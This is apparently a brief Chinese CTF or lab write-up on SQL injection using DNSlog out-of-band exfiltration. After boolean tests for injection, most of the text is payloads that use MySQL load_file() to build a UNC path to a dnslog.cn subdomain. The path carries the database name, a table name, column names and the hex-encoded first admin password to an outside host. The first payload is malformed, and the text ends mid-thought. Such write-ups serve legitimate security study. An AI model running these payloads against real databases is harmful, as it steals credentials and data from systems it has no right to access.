前提:目标数据库允许load_file()
1 and 1=1 //正常
1 and 1=2 //页面错误,存在注入
1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了
构造poyload
1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc')))
1+and+(select+load_file(concat('//',(select+table_name+from+information_schema.tables+where+table_schema=database()limit+0,1),'.pu9n3b.dnslog.cn/1.txt'))) //读表
1+and+(select+load_file(concat('//',(select+column_name+from+information_schema.columns+where+table_name='admin'limit+0,1),'.pu9n3b.dnslog.cn/1.txt'))) //读字段
1+and+(select+load_file(concat('//',(select+hex(password)+from+admin+limit+0,1),'.pu9n3b.dnslog.cn/1.txt'))) //读password字段第一个值
字段值